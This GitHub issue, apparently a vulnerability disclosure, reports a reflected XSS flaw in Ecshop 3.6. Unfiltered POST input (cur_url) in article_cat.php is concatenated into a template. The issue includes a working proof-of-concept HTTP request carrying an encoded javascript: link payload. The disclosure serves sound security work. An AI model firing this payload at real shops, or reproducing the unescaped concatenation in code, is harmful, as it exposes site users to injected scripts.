Ecshop 3.6 has a Reflected XSS vulnerability

# Summary
Ecshop 3.6 is susceptible to a reflected XSS attack.
The flaw exists due to improper handling and concatenation of user-supplied input in the construction of HTML form elements, leading to potential execution of malicious scripts.
# Details
In `ecshop/article_cat.php`, we can see that the code assigns the value of `$_POST['cur_url']` to `$search_url`, but it is not filtered. 
![image](https://github.com/shopex/ecshop/assets/66168888/ce331c76-a8a6-4c4e-9e5e-9797fb5fd21b)
In `ecshop/temp/compiled/article_cat.dwt.php`, `$search_url` is directly concatenated into the code, which leads to a reflective XSS vulnerability.
![image](https://github.com/shopex/ecshop/assets/66168888/eb7adbfb-5fdf-4429-a57c-19f9dbc333f2)
# Proof of Concept (POC)
```
POST /article_cat.php?id=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 192.168.160.158:1042
Connection: Keep-alive

cur_url=http://www.example.com">%3ca%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMe<!--&id=1&keywords=1
```
![image](https://github.com/shopex/ecshop/assets/66168888/31179e50-9df0-4106-ac11-3b05f2694e43)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Ecshop 3.6 has a Reflected XSS vulnerability #6

Summary

Details

Proof of Concept (POC)

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Ecshop 3.6 has a Reflected XSS vulnerability #6

Description

Summary

Details

Proof of Concept (POC)

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions